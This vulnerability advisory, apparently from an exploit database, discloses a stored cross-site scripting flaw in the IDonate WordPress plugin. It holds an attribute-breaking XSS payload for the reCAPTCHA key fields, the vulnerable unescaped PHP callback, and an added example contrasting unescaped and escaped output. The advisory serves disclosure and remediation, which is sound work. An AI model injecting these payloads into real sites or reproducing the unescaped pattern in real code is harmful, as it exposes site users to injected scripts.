# Exploit Title: IDonate – blood request management system <=1.8.1 - Stored Cross-Site Scripting (Authenticated)
# Date: 29-02-2024
# Exploit Author: Laburity Research Team
# Vendor Homepage: https://wordpress.org/plugins/idonate/
# Version: <=1.8.1
# Tested on: Firefox
# Contact me: contact [at] laburity.com

# Summary:

A stored cross-site scripting vulnerability has been identified in the WordPress plugin IDonate – blood request management system, version less than 1.8.1. It allows authenticated users to run arbitrary JavaScript code inside WordPress through the plugin's settings.

# POC

1- Navigate to http://localhost:10003/wp-admin/admin.php?page=idonate-setting-admin
2- Enter payload "><h1 onclick=alert(1)>XSS</h1> in Recaptcha secret key and in Recaptcha Site key
3- Click on save changes.
4- While clicking on the payload text, XSS will trigger.

# Vulnerable Code:

```
public function idonate_recaptcha_secretkey_callback() {
    // Read the stored option, defaulting to an empty string.
    if( isset( $this->general_options['idonate_recaptcha_secretkey'] ) ){
        $secretkey = $this->general_options['idonate_recaptcha_secretkey'];
    }else{
        $secretkey = '';
    }
    // The stored value is placed into the value attribute as-is (no escaping).
    printf(
        '<input type="text" id="idonate_recaptcha_secretkey" value="%s" name="idonate_general_option_name[idonate_recaptcha_secretkey]" />',
        $secretkey
    );
}
```

The secret key (idonate_recaptcha_secretkey) is printed into the input's value attribute without sanitization.
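The callback's unescaped output beside a hardened version, as an added example that is not the plugin's code or the vendor's fix. `esc_attr()` is the WordPress escaping function for attribute context (a stand-in is defined here so the file runs under the PHP CLI); the helper names and the allowed character set for reCAPTCHA keys are assumptions.

```php
<?php
// Added example, not the plugin's code. Outside WordPress, a minimal stand-in
// for esc_attr() is defined so the file runs under the PHP CLI.
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES, 'UTF-8' );
    }
}

// Markup template copied from the advisory's vulnerable callback.
const FIELD_TEMPLATE = '<input type="text" id="idonate_recaptcha_secretkey" value="%s" '
    . 'name="idonate_general_option_name[idonate_recaptcha_secretkey]" />';

// Hypothetical helper: read the stored key or fall back to an empty string.
function stored_secretkey( array $options ) {
    return isset( $options['idonate_recaptcha_secretkey'] )
        ? (string) $options['idonate_recaptcha_secretkey']
        : '';
}

// Behaviour the advisory describes: the stored value reaches the attribute as-is.
function render_secretkey_unescaped( array $options ) {
    return sprintf( FIELD_TEMPLATE, stored_secretkey( $options ) );
}

// Hardened: escape for the HTML attribute context at output time.
function render_secretkey_escaped( array $options ) {
    return sprintf( FIELD_TEMPLATE, esc_attr( stored_secretkey( $options ) ) );
}

// Defence in depth on save. Assumption: reCAPTCHA keys contain only letters,
// digits, '_' and '-', so everything else is dropped before storage.
function sanitize_recaptcha_key( $value ) {
    return preg_replace( '/[^A-Za-z0-9_-]/', '', (string) $value );
}

// Stored option holding the PoC value from the advisory.
$stored = array( 'idonate_recaptcha_secretkey' => '"><h1 onclick=alert(1)>XSS</h1>' );

echo render_secretkey_unescaped( $stored ), PHP_EOL; // quote closes the attribute early
echo render_secretkey_escaped( $stored ), PHP_EOL;   // value stays inert inside value=""
echo sanitize_recaptcha_key( $stored['idonate_recaptcha_secretkey'] ), PHP_EOL;
```

Inside WordPress, a sanitizer like this would be attached through the `sanitize_callback` argument of `register_setting()`, with output escaping kept in place regardless of what was stored.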